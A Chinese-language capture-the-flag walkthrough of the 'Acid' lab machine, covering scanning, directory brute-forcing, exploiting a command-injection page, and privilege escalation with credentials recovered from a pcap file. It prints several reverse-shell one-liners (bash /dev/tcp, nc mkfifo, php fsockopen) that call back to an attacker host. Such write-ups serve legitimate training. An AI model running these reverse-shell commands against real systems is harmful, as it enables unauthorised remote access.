靶机实战-Acid

Acid靶机实战

1、主机发现

目标主机：192.168.232.160
我是用arp命令扫的，大家可自行选择

2、端口扫描

3、端口详细信息扫描

4、访问8080端口

只有一个文件，点击就会下载，先pass

5、访问33447端口

查看网页源代码：

发现一串16进制的数,转化成字符：

d293LmpwZw==
base64在转化：//得到 wow.jpg

是张图片，找找网站有没有存放图片的路径：

把/wow.jpg加上看看

保存图片到本地，查看有没有隐藏什么信息,用Nodepad++打开。发现最后有一些数字，看着像16进制

然后利用txt把:替换为空



到这网页上的东西就解出来了，就一个图片
然后扫一下其它目录：//kali中启动DirBuster，暴力**web目录


扫描出来的 /Challenge 目录与上面网页的标题相对应，访问一下：

访问此目录下的php：



发现cake.php中点一下login就会跳转到index.php登录页面，而且标题跟 /Challenge 标题格式是一样的，果断加到url后打开看看：

根据报错提示说明还是存在这个页面的，继续**一下目录看看有没有别的可以访问的页面:

发现了一个command.php页面，估计是直接命令执行的页面：

可以执行ping命令，利用bp抓包看看：

命令可执行，直接反弹shell：
kali开启监听：

尝试使用bash -i >& /dev/tcp/192.168.232.158/4444 0>&1反弹shell

不行，改url编码：


还是不行…
尝试使用
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.232.158 4444 >/tmp/f


也不行…
尝试使用
;php -r ‘$sock=fsockopen(“192.168.232.158”,4444);exec("/bin/sh -i <&3 >&3 2>&3");’


点击go之后发现没有回包，去kali查看：

成功反弹shell

由于反弹shell的姿势多，一个不行就换，需要一个一个尝试

6、提权

查看/etc/passwd文件

重点关注的用户acid,saman
分别查看用户下的文件：


看到了第一条/sbin/raw_vs_isi/hint.pcapng，百度了一下是个能用Wireshark打开的流量抓包文件，下载下来打开看一下：

报错没有权限，执行su命令

必须在终端上运行，用python -c启动一个终端：

然后再执行scp那个命令：

用Wireshark打开：

发现用户名saman及密码1337hax0r
提权：


提权成功